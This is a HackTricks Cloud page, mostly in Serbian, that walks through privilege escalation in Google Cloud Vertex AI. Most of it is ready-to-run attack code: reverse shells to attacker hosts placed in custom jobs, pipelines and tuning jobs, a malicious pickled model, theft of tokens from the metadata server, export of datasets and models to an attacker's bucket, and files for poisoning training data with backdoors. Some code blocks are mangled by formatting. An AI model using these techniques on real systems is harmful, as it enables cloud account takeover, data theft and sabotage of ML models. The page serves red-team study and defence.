GCP - Vertex AI Privesc
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Vertex AI
Za više informacija o Vertex AI pogledajte:
aiplatform.customJobs.create, iam.serviceAccounts.actAs
Sa permisijom aiplatform.customJobs.create i iam.serviceAccounts.actAs na ciljanom service account-u, napadač može izvršiti proizvoljan kod sa povišenim privilegijama.
Ovo se postiže kreiranjem custom training job-a koji pokreće kod pod kontrolom napadača (bilo custom container ili Python package). Navođenjem privilegovanog service account-a pomoću --service-account flag-a, job nasleđuje dozvole tog service account-a. Job se izvršava na Google-managed infrastructure i ima pristup GCP metadata service-u, što omogućava izdvajanje OAuth access token-a service account-a.
Uticaj: Potpuna eskalacija privilegija do dozvola ciljanog service account-a.
Kreiraj custom job sa reverse shell
```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region=On your attacker machine, start a listener first:
nc -lvnp 4444
Once connected, you can extract the token with:
curl -H ‘Metadata-Flavor: Google’ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create
–region=
–display-name=revshell-job
–worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
–command=sh
–args=-c,“python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”
–service-account=
</details>
<details>
<summary>Alternativa: Izdvoji token iz logova</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
aiplatform.models.upload, aiplatform.models.get
Ova tehnika postiže eskalaciju privilegija tako što se otpremi model u Vertex AI, a zatim se taj model iskoristi za izvršavanje koda sa povišenim privilegijama putem endpoint deployment-a ili batch prediction job-a.
Note
Da biste izveli ovaj napad, potrebno je imati world readable GCS bucket ili kreirati novi za otpremu model artefakata.
Otpremite zlonamerni pickled model sa reverse shell-om
```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickleclass MaliciousModel: def reduce(self): import subprocess cmd = “bash -i >& /dev/tcp/YOUR-IP/4444 0>&1” return (subprocess.Popen, ([‘/bin/bash’, ‘-c’, cmd],))
Save malicious model
with open(‘model.pkl’, ‘wb’) as f: pickle.dump(MaliciousModel(), f) EOF
python3 create_malicious_model.py
Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/
Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload
–region=
–artifact-uri=gs://your-bucket/malicious-model/
–display-name=malicious-sklearn
–container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
On attacker: nc -lvnp 4444 (shell connects when deployment starts)
</details>
<details>
<summary>Otpremanje modela sa reverse shell-om u kontejneru</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
[!DANGER] Nakon uploadovanja malicioznog modela napadač može sačekati da ga neko upotrebi, ili ga sam pokrenuti putem deploy-a na endpoint ili batch prediction job-a.
iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )
Ako imate dozvole za kreiranje i deploy modela na endpoint-e, ili za izmenu endpoint IAM politika, možete iskoristiti uploadovane maliciozne modele u projektu da postignete privilege escalation. Da biste aktivirali jedan od ranije uploadovanih malicioznih modela preko endpoint-a, sve što treba da uradite je:
Deploy malicious model to endpoint
```bash # Create an endpoint gcloud ai endpoints create \ --region=Deploy with privileged service account
gcloud ai endpoints deploy-model
–region=
–model=
–display-name=revshell-deployment
–service-account=
–machine-type=n1-standard-2
–min-replica-count=1
</details>
#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
Ako imate dozvole za kreiranje **batch prediction jobs** i za njegovo pokretanje koristeći service account, možete pristupiti metadata service-u. Maliciozni kod se izvršava iz **custom prediction container** ili **malicious model** tokom procesa batch prediction.
**Note**: Batch prediction jobs se mogu kreirati samo preko REST API-ja ili Python SDK-a (nema podrške za gcloud CLI).
> [!NOTE]
> Ovaj napad zahteva prvo otpremanje malicious model (pogledajte odeljak `aiplatform.models.upload` iznad) ili korišćenje custom prediction container-a sa vašim reverse shell code-om.
<details>
<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.models.export
Ako imate models.export dozvolu, možete izvesti artefakte modela u GCS bucket koji kontrolišete, potencijalno pristupajući osetljivim podacima za obuku ili fajlovima modela.
Note
Da biste izveli ovaj napad, potrebno je da imate GCS bucket koji je javno čitljiv i u koji se može pisati, ili da kreirate novi bucket u koji ćete otpremiti artefakte modela.
Izvezi artefakte modela u GCS bucket
```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export”
-d ‘{
“outputConfig”: {
“exportFormatId”: “custom-trained”,
“artifactDestination”: {
“outputUriPrefix”: “gs://your-controlled-bucket/exported-models/”
}
}
}’
Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Kreirajte **ML pipeline jobs** koji izvršavaju više koraka sa proizvoljnim kontejnerima i ostvarite privilege escalation putem reverse shell pristupa.
Pipelines su posebno moćni za privilege escalation jer podržavaju multi-stage napade u kojima svaka komponenta može koristiti različite kontejnere i konfiguracije.
> [!NOTE]
> Potrebno vam je world writable GCS bucket koji će se koristiti kao pipeline root.
<details>
<summary>Instalirajte Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Kreiraj pipeline job sa reverse shell kontejnerom
```python #!/usr/bin/env python3 import json import subprocessPROJECT_ID = “
Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = { “schemaVersion”: “2.1.0”, “sdkVersion”: “kfp-2.0.0”, “pipelineInfo”: { “name”: “data-processing-pipeline” }, “root”: { “dag”: { “tasks”: { “process-task”: { “taskInfo”: { “name”: “process-task” }, “componentRef”: { “name”: “comp-process” } } } } }, “components”: { “comp-process”: { “executorLabel”: “exec-process” } }, “deploymentSpec”: { “executors”: { “exec-process”: { “container”: { “image”: “python:3.11-slim”, “command”: [“python3”], “args”: [“-c”, “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘4.tcp.eu.ngrok.io’,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([‘/bin/bash’,‘-i’])”] } } } } }
Create the request body
request_body = { “displayName”: “ml-training-pipeline”, “runtimeConfig”: { “gcsOutputDirectory”: “gs://gstorage-name/folder” }, “pipelineSpec”: pipeline_spec, “serviceAccount”: TARGET_SA }
Get access token
token_result = subprocess.run( [“gcloud”, “auth”, “print-access-token”], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()
Submit via REST API
import requests
url = f“https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs“ headers = { “Authorization”: f“Bearer {access_token}“, “Content-Type”: “application/json” }
print(f“Submitting pipeline job to {url}“) response = requests.post(url, headers=headers, json=request_body)
if response.status_code in [200, 201]: result = response.json() print(f“✓ Pipeline job submitted successfully!“) print(f” Job name: {result.get(‘name’, ‘N/A’)}“) print(f” Check your reverse shell listener for connection“) else: print(f“✗ Error: {response.status_code}“) print(f” {response.text}“)
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Kreirajte **hyperparameter tuning jobs** koji izvršavaju proizvoljan kod sa povišenim privilegijama putem custom training containers.
Hyperparameter tuning jobs omogućavaju vam da pokrenete više training trial-ova paralelno, svaki sa različitim hyperparameter vrednostima. Specificiranjem malicioznog container-a sa reverse shell-om ili exfiltration komandом, i povezivanjem sa privilegovanim service account-om, možete postići eskalaciju privilegija.
**Uticaj**: Potpuna eskalacija privilegija do dozvola ciljnog service account-a.
<details>
<summary>Kreirajte hyperparameter tuning job sa reverse shell-om</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.datasets.export
Izvezite datasets kako biste izvršili exfiltrate training data koje mogu sadržati osetljive informacije.
Napomena: Operacije sa dataset-ovima zahtevaju REST API ili Python SDK (gcloud CLI ne podržava dataset-e).
Dataseti često sadrže originalne podatke za treniranje koji mogu uključivati PII, poverljive poslovne podatke ili druge osetljive informacije koje su korišćene za treniranje produkcijskih modela.
Izvezite dataset za exfiltrate training data
```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"curl -s -X GET
-H “Authorization: Bearer $(gcloud auth print-access-token)”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets”
Step 2: Export a dataset to your own bucket using REST API
DATASET_ID=“
curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export”
-d ‘{
“exportConfig”: {
“gcsDestination”: {“outputUriPrefix”: “gs://your-controlled-bucket/exported-data/”}
}
}’
The export operation runs asynchronously and will return an operation ID
Wait a few seconds for the export to complete
Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/
Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
Step 4: View the exported data
The data will be in JSONL format with references to training data locations
cat exported-data//data-.jsonl
The exported data may contain:
- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data
</details>
### `aiplatform.datasets.import`
Uvoz zlonamernih ili otrovanih podataka u postojeće skupove podataka kako bi se **manipulisalo treniranjem modela i ubacili backdoors**.
**Napomena**: Operacije nad dataset-ima zahtevaju REST API ili Python SDK (nema gcloud CLI podrške za datasete).
Uvođenjem pažljivo pripremljenih podataka u dataset koji se koristi za treniranje ML modela, napadač može:
- Ubaciti backdoors u modele (pogrešna klasifikacija aktivirana trigger-om)
- Zatrovati podatke za treniranje kako bi se pogoršale performanse modela
- Ubaciti podatke da nateraju modele da leak informacije
- Manipulisati ponašanje modela za specifične ulaze
Ovaj napad je posebno efikasan kada cilja skupove podataka koji se koriste za:
- Klasifikaciju slika (ubaci pogrešno označene slike)
- Klasifikaciju teksta (ubaci pristrasan ili zlonameran tekst)
- Detekciju objekata (manipulisanje bounding box-ovima)
- Sisteme preporuka (ubaci lažne preferencije)
<details>
<summary>Import poisoned data into dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
Scenariji napada:
Backdoor attack - Image classification
```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```Label flipping attack
```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```Data poisoning za model extraction
```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```Ciljani napad na određene entitete
```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```[!DANGER] Data poisoning attacks can have severe consequences:
- Sistemi bezbednosti: Zaobići prepoznavanje lica ili detekciju anomalija
- Detekcija prevara: Obučiti modele da ignorišu specifične obrasce prevara
- Moderacija sadržaja: Naterati da štetni sadržaj bude klasifikovan kao bezbedan
- Medical AI: Pogrešno klasifikovati kritična zdravstvena stanja
- Autonomni sistemi: Manipulisati detekcijom objekata za odluke kritične po bezbednost
Uticaj:
- Backdoored models that misclassify on specific triggers
- Smanjena performansa i tačnost modela
- Pristrasni modeli koji diskriminišu određene ulaze
- Procurivanje informacija kroz ponašanje modela
- Dugoročna postojanost (modeli trenirani na poisoned data će naslediti backdoor)
aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs
Warning
Note
Deprecated API: The
aiplatform.notebookExecutionJobs.createAPI is deprecated as part of Vertex AI Workbench Managed Notebooks deprecation. The modern approach is using Vertex AI Workbench Executor which runs notebooks throughaiplatform.customJobs.create(already documented above). Vertex AI Workbench Executor omogućava zakazivanje pokretanja notebook-a koji se izvršavaju na Vertex AI custom training infrastrukturi sa određenim servisnim nalogom. Ovo je ustvari praktičan omotač okocustomJobs.create. Za privilege escalation putem notebook-ova: Koristiteaiplatform.customJobs.createmetodu dokumentovanu iznad, koja je brža, pouzdanija i koristi istu osnovnu infrastrukturu kao Workbench Executor.
Sledeća tehnika je navedena isključivo radi istorijskog konteksta i nije preporučljiva za upotrebu u novim procenama.
Kreirajte zadatke izvršavanja notebook-a koji pokreću Jupyter notebooks sa proizvoljnim kodom.
Notebook jobs su idealni za izvršavanje koda u interaktivnom stilu sa servisnim nalogom, jer podržavaju Python code cells i shell komande.
Kreirajte zlonamerni notebook fajl
```bash # Create a malicious notebook cat > malicious.ipynb <<'EOF' { "cells": [ { "cell_type": "code", "source": [ "import subprocess\n", "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n", "print(token.decode())" ] } ], "metadata": {}, "nbformat": 4 } EOFUpload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
</details>
<details>
<summary>Pokreni notebook sa ciljnim servisnim nalogom</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
Izvori
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
HackTricks Cloud

